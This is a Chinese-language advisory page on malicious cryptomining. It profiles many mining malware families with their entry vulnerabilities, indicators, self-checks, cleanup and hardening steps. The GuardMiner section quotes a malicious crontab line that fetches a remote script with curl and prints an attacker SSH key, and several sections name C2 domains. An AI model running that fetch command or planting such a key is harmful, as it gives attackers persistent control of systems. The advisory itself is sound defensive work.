新闻动态
通知公告
当前位置: 首页>>新闻动态>>通知公告>>正文

恶意挖矿问题解决办法-个人篇

2021年11月25日 09:11  点击:[]

个人用户面对的恶意挖矿问题 

相比企业机构来说个人上网用户面对着同样相似的恶意挖矿问题如个人 电脑手机路由器以及各类智能设备存在被感染和用于恶意挖矿的情况像 现在手机的硬件配置往往能够提供很高的算力。奇安信威胁情报中心在 2018 年 就配合网络研究院及多个安全部门联合分析和披露了名为 ADB.Miner 的安卓蠕 [2],其就是利用智能电视或智能电视盒子进行恶意挖矿。

当用户安装了内嵌有挖矿程序模块的 APP 应用,或访问了植入有挖矿脚本 的不安全网站或被入侵的网站往往就会造成设备算力被用于恶意挖矿而其影 响通常会造成设备和系统运行不稳定异常发热和耗电甚至会影响设备的使用 寿命和电池寿命。 

如何避免感染恶意挖矿程序 

以下我们提出几点安全建议让个人用户避免感染恶意挖矿程序:

1.  提高安全意识,从正常的应用市场和渠道下载安装应用程序,不要随意 点击和访问一些具有诱导性质的网页;

2.  及时更新应用版本,系统版本和固件版本;

3.  安装个人终端安全防护软件。

 

典型的恶意挖矿恶意代码家族及自查方法 

8220 挖矿攻击 

概述

 

 

挖矿攻击名称

8220 团伙挖矿攻击

涉及平台

Linux

相关恶意代码家族

未命名

攻击入口

利用多种远程执行漏洞和未授权访问漏洞

相关漏洞及编号

WebLogic XMLDecoder 反序列化漏洞、Drupal 的远程任意代码执行漏洞、JBoss

 

反序列化命令执行漏洞、Couchdb 的组合漏洞、RedisHadoop 未授权访问漏洞

描述简介

8220 团伙挖矿攻击是奇安信威胁情报中心发现的挖矿攻击黑客团伙,其主

 

要针对高校相关的 Linux 服务器实施挖矿攻击。

 

自查办法

 

1. 执行 netstat -an 命令,存在异常的 8220 端口连接

2. top 命令查看 CPU 占用率最高的进程名为 java,如下图为利用 Hadoop 未授权 访问漏洞攻击

 3. /var/tmp/目录下存在如 javapscf3w.conf 等名称的文件

4. 执行 crontab -u yarn -l 命令查看是否存在可疑的定时任务 

5. 通过查看/var/log/cron*相关的 crontab 日志看是否存在利用 wget 访问和下载 异常的远程 shell 脚本

 

 

如何清除和防护 

1. 终止挖矿进程,删除/var/tmp 下的异常文件

2.    删除异常的 crontab 任务

3. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新 版本,若组件或服务未配置远程认证访问,则开启相应的认证配置


 

WannaMiner/MsraMiner/HSMiner 

概述 

挖矿攻击名称

WannaMiner

涉及平台

Windows

相关恶意代码家族

WannaMinerMsraMinerHSMiner

攻击入口

使用永恒之蓝漏洞

相关漏洞及编号

CVE-2017-0144

描述简介

WannaMiner 是一个非常活跃的恶意挖矿家族,曾被多个安全厂商披露和命 名,包括 WannaMinerMsraMinerHSMiner。其最早活跃于 2017 9 月,以 使用“永恒之蓝”漏洞为攻击入口以及使用 Mimikatz”凭证窃取工具攻击服务器

植入矿机,并借助 PowerShell WMI 实现无文件。

 

自查方法

 

1.    检查是否存在任务计划名为:“Microsoft\Windows\UPnP\Spoolsv”的任务

2.    检查%windir%目录下是否存在 cls.batspoolsv.exewindows.exe 文件 3.  并检查是否存在可疑的 java.exe 进程

 

如何清除 

1.  删除检查到的可疑任务计划和自启动项
2.  结 束 可 疑 的 进 程 , 如 运 行 路 径 为 : %windir%\IME\Microsofts\ 和 运 行 路 径 %windir%\spoolsv.exe %windir%\windows.exe 的进程

3.  删除 c 盘目录下的 012.exe023.exe 文件 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新

2.  如果不需要使用 Windows 局域网共享服务可以通过设置防火墙规则来关闭

445 等端口 

3.  安装奇安信天擎可有效防护该类挖矿病毒的攻击 

JbossMiner 

概述

 

挖矿攻击名称

JbossMiner

涉及平台

WindowsLinux  服务器或主机

相关恶意代码家族

JbossMiner

攻击入口

利用多种远程执行漏洞和未授权访问漏洞

相关漏洞及编号

jboss 漏洞利用模块,structs2 利用模块,永恒之蓝利用模块,mysql 利用模块,

 

redis 利用模块,Tomcat/Axis 利用模块

描述简介

JbossMiner 主要是通过上述六大漏洞模块进行入侵和传播,并植入挖矿木马获 利。其挖矿木马同时支持 windows linux 两种平台,根据不同的平台传播不同

payload

 

自查方法 

Linux 平台 

1. 检查是否存在/tmp/hawk 文件
2. 检查是否存在/tmp/lower*.sh /tmp/root*.sh 文件 3. 检查 crontab 中是否有可疑的未知定时任务

 

Windows 平台 

1.  检查是否有名为 Update*的可疑计划任务和 Updater*的可疑启动项
2.  检查是否存在%temp%/svthost.exe %temp%/svshost.exe 文件
3.  检查是否存在一个 rigd32.txt 的进程 

如何清除 

Linux 平台 

可以执行如下步骤执行清除:

1.  删除 crontab 中可疑的未知定时任务

2.  删除/tmp/目录下的 bashdlower*.shroot*.sh 等可疑文件 3.  结束第 2 步发现的各种可疑文件对应的可疑进程。 

Windows 平台 

可以执行如下步骤进行清除:
1.  删除可疑的计划任务和启动项

2.    结束进程中名为 svshost.exesvthost.exe 的进程

3.    结束可疑的 powershell.exeregd32.txt 等进程
4.  清空%temp%目录下的所有缓存文件 

防护方法 

1.  如果不需要使用 Windows 局域网共享服务可以通过设置防火墙规则来关闭445 等端口

2.  修改服务器上的数据库密码,设置为更强壮的密码

3.  安装系统补丁和升级产品所使用的类库

4.  Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

MyKings 

MyKings 是一个大规多重僵尸网络安装门罗币挖矿机利用服务器资 源挖矿。 

概述

 

挖矿攻击名称

MyKings

涉及平台

Windows 平台

相关恶意代码家族

DDoSProxyRATMirai

攻击入口

通过扫描开放端口,利用漏洞和弱口令进行入侵

相关漏洞及编号

永恒之蓝

描述简介

MyKings  是一个由多个子僵尸网络构成的多重僵尸网络,2017  4  月底以来, 该僵尸网络一直积极地扫描互联网上 143及其他多个端并在渗透进入受害 者主机后传播包括 DDoSProxyRATMiner  在内的多种不同用途的恶意代

码。

 

自查方法

1.  检查是否存在以下文件: c:\windows\system\my1.bat c:\windows\tasks\my1.job c:\windows\system\upslist.txt c:\program files\kugou2010\ms.exe c:\windows\system\cab.exe c:\windows\system\cabs.exe
2.  检查是否有名为 xWinWpdSrv 的服务

 

如何清除 

可以执行如下步骤进行清除:

1. 删除自查方法 1 中所列的文件

2. 停止并删除 xWinWpdSrv 服务 

防护办法

从僵尸网络当前的攻击重点来看,防范其通过 1433 端口入侵计算机是非常有必 要的。此外,Bot 程序还有多种攻击方式尚未使用,这些攻击方式可能在未来的 某一天被开启因此也需要防范可能发生的攻击对此我们总结以下几个防御 策略:

1. 对于未遭到入侵的服务器注意 mySQLRDPTelnet 等服务的弱口令问题。 如果这些服务设置了弱口令,需要尽快修改;

2. 对于无需使用的服务不要随意开放,对于必须使用的服务,注意相关服务的 弱口令问题;

   3. 特别注意 445 端口的开放情况,如果不需要使用 Windows 局域网共享服务,

可以通过设置防火墙规则来关闭 445 等端口。并及时打上补丁更新操作系统。
4. 关注服务器运行状况注意 CPU 占用和进程列表和网络流量情况可以及时 发现系统存在的异常。此外,注意系统账户情况,禁用不必要的账户。
5. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

ADB.Miner 挖矿攻击自查方法 

概述

 

挖矿攻击名称

ADB.Miner

涉及平台

搭载安卓系统的移动终端,智能设备

相关恶意代码家族

ADB.Miner

攻击入口

利用安卓开启的监听 5555 端口的 ADB 调试接口传播

相关漏洞及编号

描述简介

ADB.Miner 是由奇安信发现的利用安卓设备的 ADB 调试接口传播的恶意挖矿程

 

序,其支持利用 xmrig coinhive 两种形式进行恶意挖矿。

 

自查方法 

1. 执行 top 命令,按"C"查看 CPU 占用率进程,存在类似 com.ufo.miner 的进程

 

   

 

2. 执行 ps | grep debuggerd 命令,存在/system/bin/debuggerd_real 进程

    

3. 执行 ls /data/local/tmp 命令,查看目录下是否存在如下文件名称:droidbot, nohup, bot.dat, xmrig*, invoke.sh, debuggerd 等。 

如何清除 

可以执行如下步骤进行清除:

1. pm uninstall com.ufo.miner 移除相关挖矿程序 APK

2. 执行 ps | grep /data/local/tmp 列举相关挖矿进程,执行 kill -9 进行终止
3.    执行 rm 命令删除/data/local/tmp 下相关文件
4.  mv /system/bin/debuggerd_real /system/bin/debuggerd 恢复 debuggerd 文件 

防护办法

可以采用如下方式进行防护:

1. 进入设置界面,关闭 adb 调试或 adb wifi 调试开关
2.    执行 setprop service.adb.tcp.port 设置调试端口为其他值,ps | grep adbd 获得

adbd 进程并执行 kill -9 进行终止

3. root 权限下可以配置 iptables 禁止外部访问 5555 端口:

iptables -A INPUT -p tcp -m tcp --dport 5555 -j REJECT

 

KoiMiner 

概述  

挖矿攻击名称

KoiMiner

涉及平台

WindowsLinux

相关恶意代码家族

未命名


 

 

攻击入口

Apache Struts2 漏洞攻击、针对企业 SQL Server    服务器的 1433 端口爆破攻击进

 

行蠕虫式传播

相关漏洞及编号

Apache Struts2 漏洞 S2-045CVE-2017-5638)、MS16-032 漏洞

描述简介

KoiMiner 是腾讯御见威胁报中心发现的挖矿攻击木马于挖矿木马 netxmr

 

解密代码后以模块名“koi”加载而将其命名为 KoiMiner

 

自查办法 

1.  检查 SQL Sever 服务默认端口,检查 1433 端口是否有异常连接
2.  检查是否存在下述文件: C:\WINDOWS\system32\system32.exe C:\ProgramData\system32.exe C:\Users\Public\system32.exe java/sysin
3.      检查是否存在异常服务 WinTcpAutoProxy

 如何清除和防护 

1. 终止挖矿进程

2. 加固 SQL Server 务器修补服务器安全漏洞使用安全的密码策略 使用 高强度密码,切勿使用弱口令,特别是 sa 账号密码,防止黑客暴力破解。

3.  修改 SQL Sever 服务默认端口,在原始配置基础上更改默认 1433 端口设置, 并且设置访问规则,拒绝 1433 端口探测。

4. 删除自查方法 2 中所述文件 

NSABuffMiner 

概述 

涉及平台

Windows

相关恶意代码家族

未命名

攻击入口

使用 EternalBlueDoublePulsarEternalRomance 等漏洞进行攻击

相关漏洞及编号


MS17-010

描述简介

NSABuffMiner 是腾讯安全御见威胁情报中心在 2018 9 月发现的一个挖矿 木马家族,主要利用永恒之蓝漏洞 ms17-010 攻击传播, Payload 下载植入的安 装木马常常伪装成某些主流软件程序,常用挖矿进程名为 rundllhost.exe,  因其主

C2 域名中包含“buff”特征字符而命名。

 

自查方法


1.  检查是否存在服务名为:“MetPipAtcivator”、“SetPipAtcivator
2.  检查是否存在可疑账户名“mm123$
3.  并检查是否存在可疑的 rundllhost.exe 进程 

如何清除

1.  删除检查到的可疑的服务名及账户名

2.  结束可疑的进程如运行路径为:%SystemRoot%fonts\rundllhost.exe 的进程

 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新

2.  如果不需要使用 Windows 局域网共享服务可以通过设置防火墙规则来关闭445 等端口

3.  安装奇安信天擎防护该类挖矿病毒的攻击 

NSAGluptebaMiner

概述

涉及平台

Windows

相关恶意代码家族

Glupteba 木马

攻击入口

使用 EternalBlueDoublePulsar 等漏洞进行攻击

相关漏洞及编号

MS17-010

描述简介

2018 6 月腾讯安全威胁情报中心发现 cloudnet.exe 开始作为挖矿僵尸网络 NSAGluptebaMiner 的组件传播,cloudnet.exe 原来是 Glupteba 恶意木马。其利用 永恒之蓝漏洞进行传播,通过安装计划任务进行持久化,安装驱动对木马进行保

利用组件 cloudnet.exe 构建僵尸网络并通过比特币交易数据更新 C2 地址。

 

自查方法

1.    检查是否有名为 ScheduledUpdate 的可疑计划任务

2.    检查 C:\Windows\System32\drivers 目录下是否存在隐藏文件 Winmon.sys WinmonFS.sysWinmonProcessMonitor.sys 文件

3.  检查是否存在一个 wup.exe 的进程

 

如何清除 

1. 删除可疑的计划任务和启动项

2.    结束进程中名为 Scheduled.exewup.exe 的进程
3.    删除 C:\Windows\System32\drivers 目录下的隐藏驱动文件 Winmon.sys、 WinmonFS.sysWinmonProcessMonitor.sys

 

防护方法 

1.  如果不需要使用 Windows 局域网共享服务可以通过设置防墙规则来关闭

445 等端口

2.  安装 Windows 系统补丁并保持自动更新

3.  安装奇安信天擎防护该类挖矿病毒的攻击 

BuleHero

概述 

挖矿攻击名称

BuleHero

涉及平台

Windows 平台

相关恶意代码家族

未命名

攻击入口

通过扫描开放端口,利用漏洞和弱口令进行入侵

相关漏洞及编号

永恒之蓝、LNK 漏洞 CVE-2017-8464Tomcat 任意文件上传漏洞

CVE-2017-12615Apache Struts2 远程代码执行漏洞 CVE-2017-5638Weblogic 反序列化任意代码执行漏洞 CVE-2018-2628CVE-2019-2725Drupal 远程代码 执行漏洞 CVE-2018-7600Apache Solr 远程代码执行漏洞 CVE-2019-0193 THinkphpV5 漏洞 CNDV-2018-24942PHPStudy 后门利用等

描述简介

BlueHero 是一个善于学习和使用各类 Web 服务器组件漏洞进行攻击的家族,于

2018 8 月首次被披露。自披露以来,其版本不断的在更新迭代,其在 4.0 版本 新加入的攻击方法就达到十个之多。

 

自查方法
1.  检查是否存在 C:\Windows\tqibchipg\目录,以及下述文件: C:\Windows\SysWOW64\rmnlik.exe C:\Windows\Temp\geazqmbhl\hvkeey.exe
2.  检查是否有名为 mekbctynn 的服务 

如何清除

 可以执行如下步骤进行清除:

1. 删除自查方法 1 中所列目录下的所有文件以及后述文件
2.    停止并删除 mekbctynn 服务 

防护办法 

1. 安装 Windows 补丁并保持自动更新对于无需使用的服务不要随意开放, 对于必须使用的服务,注意相关服务的弱口令问题;

2. 关注服务器运行状况注意 CPU 占用和进程列表和网络流量情况可以及时 发现系统存在的异常。此外,注意系统账户情况,禁用不必要的账户。

3. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击 

GuardMiner 

概述 

挖矿攻击名称

GuardMiner

涉及平台

Windows, Linux

相关恶意代码家族

GuardMiner

攻击入口

利用多种远程执行漏洞和未授权访问漏洞

相关漏洞及编号

CCTV 设备 RCE 漏洞Redis 授权访问漏Drupal 框架 CVE-2018-7600 漏洞; Hadoop 未授权访问漏洞Spring RCE 漏洞 CVE-2018-1273Thinkphp V5 高危漏   洞WebLogic RCE 漏洞 CVE-2017-10271SQL Server 弱口爆破Elasticsearch

RCE 漏洞 CVE-2015-1427CVE-2014-3120

描述简介

GuardMiner 最早出现于 2019 年,至今已活跃超过 2 年,该挖矿木马通过 Go 语言编写的二进制程序针对 Windows 平台和 Linux 平台进行攻击传播,通过 crontab 定时任务以及安装 SSH 公钥后门进行持久化控制,并且还会利用比特币

的交易记录来动态更新 C2 地址

 

自查办法 

1. 查看恶意文件和相关进程 


/etc/phpguard

 

/etc/phpupdate

 

/etc/networkmanager

 

2. 查看定时任务(Crontab)

 

*/30 * * * * sh /etc/newdat.sh

 

*/2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh   

 

 3.    查看恶意 SSH 公钥(/root/.ssh/authorized_keys) 

   

AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUW 

DNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO0

6jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+

Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBs

RZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvay

MH7f+Kl2yXiHN5oD9BVTkdIWX root@u17   

如何清除和防护 

1. 检查 tmpetc 目录下是否具有以下文件,清除对应的进程并删除文件

 

/tmp/phpupdate

 

/tmp/networkmanager

 

/tmp/phpguard

 

/tmp/newdat.sh

 

/tmp/config.json

 

/etc/phpupdate

 

/etc/networkmanager

 

/etc/config.json

 

/etc/newdat.sh   

 

2. 删除恶意定时任务

3. 删除 ssh authorized_keys 中的恶意公钥

4. 恢复防火墙的默认配置

5. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新 版本,若组件或服务未配置远程认证访问,则开启相应的认证配置 

z0Miner 

概述 

 

挖矿攻击名称

z0Miner

涉及平台

Windows Linux

相关恶意代码家族

z0Miner

攻击入口

利用多种远程执行漏洞和未授权访问漏洞

相关漏洞及编号

Weblogic   未授权命令执行漏CVE-2020-14882/14883ElasticSearch RCE  漏 洞 CVE-2015-1427Jenkins script console RCE  漏洞;Nexus3 命令执行漏洞

CVE-2019-7238);Confluence  远程代码执行漏洞(CVE-2019-3396,

 

CVE-2021-26084);Struts2 命令执行漏洞 s2-016s2-046

描述简介

z0Miner 2020 年开始活跃,最初活跃时利用 Weblogic 未授权命令执行漏 洞进行传播。该挖矿木马背后团伙通过批量扫描云服务器发现具有 Weblogic 漏 洞的机器,发送精心构造的数据包进行攻击。之后执行远程命令下载 shell 脚本 z0.txt 运行,再利用该 shell 脚本植入门罗币挖矿木马、挖矿任务本地持久化,以 及通过爆破 SSH 横向移动。根据该团伙控制的算力推算,当时有大约 5000 台服 务器受害。2021 9 月,国外安全厂商趋势科技披露 z0Miner 借助 Confluence

漏洞在 Windows 上传播。

 

自查办法

 

1. 查看恶意文件和相关进程

 

/tmp/.solr/solrd

 

/tmp/.solr/config.json

 

/tmp/.solr/solr.sh  

 

2. 查看包含来自 pastbin 的可疑恶意载荷的定时任务(Crontab) 

如何清除和防护 

1. 删除恶意文件,并清除相应进程 

2. 删除恶意定时任务3. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新 版本,若组件或服务未配置远程认证访问,则开启相应的认证配置

 

SystemdMiner

 概述 

 

挖矿攻击名称

SystemdMiner

涉及平台

Linux

相关恶意代码家族

SystemdMiner

攻击入口

利用多种远程执行漏洞和未授权访问漏洞,SSH 爆破,SSH 免密登录利用

相关漏洞及编号

PostgreSQL 的未授权访问漏洞和提权代码执行漏洞(CVE-2019-9193);Hadoop

 

Yarn 未授权访问漏洞

描述简介

SystemdMiner 2019 首次发现起初因其组件以 systemd-<XXX>命名 而得名但后来它们渐渐开始弃用 systemd 的命名形式改为以随机字符串命名。   SystemdMiner 在最初出现时过入侵 DDG 挖矿病毒僵尸络进行快速扩张

点是本身的 C&C 设置在暗网中,通过暗网代理服务进行通信。

 

自查办法 

1. 查看定时任务

存在运行 systemd-login 的定时任务,后期版本创建的定时任务为随机名,定时 任务脚本中除了以拼接的形式直接组成访问的恶意域名外,还会使用了 socket5 的方式用 relay.tor2socks.in 代理访问 C&C 域名

2.    定时访问带有 tor2webonion 字符串的域名或者 relay.tor2socks.in 3. /tmp 目录下出现 systemd*的文件(后期版本为随机名) 

如何清除和防护 

1. 删除恶意定时任务

2. 清除随机名的挖矿进程,清除残留的 systemd-login*.sh 病毒脚本
3. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新 版本,若组件或服务未配置远程认证访问,则开启相应的认证配置

 

WatchdogsMiner 

概述

 

挖矿攻击名称

WatchdogsMiner

涉及平台

Windows Linux

相关恶意代码家族

WatchdogsMiner

攻击入口

利用未授权访问漏洞,SSH 爆破

相关漏洞及编号

Redis 未授权访问漏洞

描述简介

WatchdogsMiner 2019 年被发现,由于其会在/tmp/目录下释放一个叫 watchdogs 的母体文件而得名。WatchdogsMiner 的初始版本会将恶意代码托管在 pastebin.com 上以绕过检测,不过后续版本已弃用,改为自己的 C&C 服务器

*.systemten.org。该病毒的特点是样本由 go 语言编译,并使用了伪装的

 

hippies/LSD 包(github_com_hippies_LSD_*

 

自查办法 

1. 查看定时任务

存在执行 pastebin.com 网站上恶意代码的定时任务

2. 查看文件

/tmp/目录下存在一个名为 watchdogs 的文件
3.    访问*.systemten.org 域名

 如何清除和防护 

1. 删除恶意动态链接库 /usr/local/lib/libioset.so
2. 删除恶意定时任务

3. 清除挖矿进程
4. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新 版本,若组件或服务未配置远程认证访问,则开启相应的认证配置 

PhotoMiner 

概述 

挖矿攻击名称

PhotoMiner 挖矿

涉及平台

Windows

相关恶意代码家族

未命名

攻击入口

爆破 FTP SMB 的弱口令

相关漏洞及编号

描述简介

PhotoMiner 是一个活跃已久的挖矿病毒家族,主要通过感染后爆破 FTP SMB

 

的弱口令进行传播。

 

自查办法 

1.  检查有无 Photo.scr 进程运行。

2.  检查每个磁盘根目录下有无 Photo.scr
3.  检查注册表  HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下 有无 Photo.scr 相关的自启动

 

如何清除和防护 

1.  终止挖矿进程,删除 Photo.scr
2.  删除上述自启动项 

DDG Mining Botnet 

概述

 

挖矿攻击名称

PhotoMiner 挖矿

涉及平台

Linux

相关恶意代码家族

未命名

攻击入口

OrientDB 漏洞

相关漏洞及编号

CVE-2017-11467 OrientDB  远程代码执行漏洞

描述简介

DDG 主要扫描互联网上的 OrientDB  数据库服务器并进行攻击。进一步的分析

 

发现,这是一个长期运营的僵尸网络,其主要目标是挖取门罗币

 

自查办法 

1.  Crontab 中有异常项目

2.  有名为 wnTKYg 的进程运行 

如何清除和防护 

1.  移除 Crontab 中的可疑项目
2.  结束有关进程

3.  即时更新相关安全补丁 

H2Miner 

概述

 

挖矿攻击名称

H2Miner 挖矿团伙

涉及平台

Linux

相关恶意代码家族

未命名

攻击入口

利用多种远程执行漏洞


 

 

相关漏洞及编号

XXL-JOB 未授权命令执行漏洞,PHPUnit 远程代码执行漏洞(CVE-2017-9841)

Supervisord 远程命令执行漏洞(CVE-2017-11610),ThinkPHP 5.X 远程命令执 行漏洞,SaltStack 远程命令执行漏洞(CVE-2020-11651   CVE-2020-11652

描述简介

H2Miner 是一个 linux 下的挖矿僵尸网络,并且利用多种漏洞进行传播

 

自查办法 

由于该挖矿家族变种较多,感染路径复杂,暂无比较通用的检查方案
1.  检查有无高 CPU 占用异常程序

2.  检查有无异常 corntab 项目

3.  检查/etc/ld.so.preload 内有无恶意预加载项

 

如何清除和防护 

1.  清除有关的恶意进程和启动项

2.  及时为相关服务和依赖升级或安装安全补丁

 

PowerGhost 

概述  

挖矿攻击名称

PowerGhost

涉及平台

WindowsLinux

相关恶意代码家族

未命名

攻击入口

永恒之蓝、MSSQL 爆破、SSH 爆破、wmi 以及 smb 爆破远程命令执行

相关漏洞及编号

永恒之蓝漏洞(MS17-010)、脏牛漏洞(CVE-20165195)  MS16-032 MS15-051

 

CVE-2018-8120

描述简介

PowerGhost   恶意软件是一个 powershell 脚本其中的主要的核心组件有挖矿程序minikatz   工具,反射 PE 注入模块、主要利用永恒之蓝的漏洞的 shellcode 以及 MS16-032MS15-051 CVE-2018-8120 漏洞提权 payload。主要针对企业用户,在大型企业内网进行传播,并且

挖矿采用无文件的方式进行,因此杀软很难查杀到挖矿程序


 

自查办法 

1.      检查是否有文件名为 java-log-9527.logcohernece.txt 的文件

2.      检查是否存在 antitrojan.ps,antivirus.ps1 等可疑文件。 

 

如何清除 

1.  终止可疑文件的相关进程

2.  彻底删除进程对应的文件 

 

防护方法

 

1、打上永恒之蓝补丁;

2、关闭 135139445 等端口,如果没有业务必要,建议封堵;

3、不要使用域管账号随意登录域内机器,域内机器密码应互不相同;

4、使用高强度密码,禁止弱口令;

5、修补 CVE-2016-5195 漏洞 

NSAFtpMiner 

概述 

挖矿攻击名称

NSAFtpMiner

涉及平台

Windows

相关恶意代码家族

未命名

攻击入口

利用密码字典爆破 1433 端口登录,以及 Eternalblue 等漏洞攻击工具来进行内网

 

攻击。

相关漏洞及编号

永恒之蓝(MS17-010)

描述简介

NSAFtpMiner 是腾讯安全御见威胁情报中心在 2018 9 月发现的一个挖矿木

 

 

   

自查方法
1.  检查是否存在服务名为:“Server Remote”。
2.  检查是否存在以下文件:
C:\Program Files\Windowsd\Fileftp.exe C:\Program Files\Windowsd\Pkil.dll C:\Windows\runsum.exe C:\Windows\Fonts\sysIntl\help.dll C:\Windows\Help\win1ogins.exe C:\Windows\PLA\system\win1ogins.exe C:\Windows\Fonts\system(x64)\win1ogins.exe C:\Windows\Fonts\system(x86)\win1ogins.exe C:\Windwos\dell\win1ogins.exe 

如何清除 

1.  删除检查到的可疑的服务

2.  终止可疑的进程以及文件如 C:\Program Files\Windowsd\Fileftp.exe 

防护方法 

1.  安装 Windows 系统补丁并保持自动更新
2.  服务器使用安全的密码策略使用高度密切勿使用弱止黑客暴力 破解
3.  安装奇安信天擎防护该类挖矿病毒的攻击 

ZombieboyMiner 

概述

 

挖矿攻击名称

ZombieboyMiner

涉及平台

Windows

相关恶意代码家族

未命名

攻击入口

使用 EternalBlueDoublePulsar 等漏洞进行攻击

相关漏洞及编号

永恒之蓝(MS17-010

描述简介

腾讯御见威胁情报中心在对黑客于 2018.08.14 注册并使用的 C2 域名 fq520000.com 及其样本进行分析,然后通过对比 Zombieboy 木马在几轮攻击中 的攻击手法、恶意代码特征、C2 域名及 IP、端口特征的一致性,推测得出攻击

来源属于同一团伙,并将其命名为 ZombieboyMiner

 

自查方法

 1.    检查是否有名 dazsksgmeakjwxo 的可疑服务

 2.    检查 C:\Windows\System32\目录下是否存在隐藏文件 seser.exe
 3.    检查是否存在 sys.exe,CPUInfo.exe,84.exe 等可疑进程 

如何清除

1.    中止可疑的服务和进程如 dazsksgmeakjwxo 服务

2.    删除可疑的文件以及自启动项如 C:\Windows\System32\seser.exe,sys.exe

 

防护方法 

1.  服务器关闭不必要的端口,例如 139、445 端口
2.  安装永恒之蓝漏洞补丁。
3.  安装奇安信天擎防护该类挖矿病毒的攻击


 

驱动人生挖矿团伙 

概述

 

挖矿攻击名称

驱动人生挖矿团伙

涉及平台

WindowsLinux

相关恶意代码家族

未命名

攻击入口

利用永恒之蓝漏洞、SMBGhost 漏洞等多种高危漏洞,MSSQL,SSH 暴力破解

相关漏洞及编号

永恒之蓝(MS17-010),SMBGhost(CVE-2020-0796)

描述简介

驱动人生”病毒自 2018 年出现,至今出现多个变种,不断进行技术优化以躲避 安全软件的查杀监测, 该病毒利用永恒之蓝漏洞、SMBGhost 漏洞等多种高危漏 洞对 WindowsLinux 下的主机进行入侵感染,在入侵成功之后不仅会下载挖矿 文件进行挖矿,还会释放传播模块继续入侵感染其他终端,并且病毒所使用的

Powershell 脚本经过多层混淆用以逃避安全软件的查杀.

 

自查方法 

1.  C:\Windows\System32\Windowspowershell\V1.0\powershell.exe 被重命名为 随机字符的 exe
2.  检查是否有/.Xl1/xr 的文件
3.  /etc/crontab 文件中是否有 a.asp 的计划任务

 

如何清除 

可以执行如下步骤进行清除:

1.  终止进程并删除/.Xl1/xr 文件
2.  删除计划任务以及对应文件 

防护办法 

1. 安装 Windows 系统漏洞补丁并保持自动更新,针对使用 445 端口的业务,进 行权限限制


2. 采用高强度的密码,避免使用弱口令密码,并定期更换密码

3. 如不使用,禁用 PowerShell

4. Windows 下可以安装奇安信天擎防护该类挖矿病毒的攻击


关闭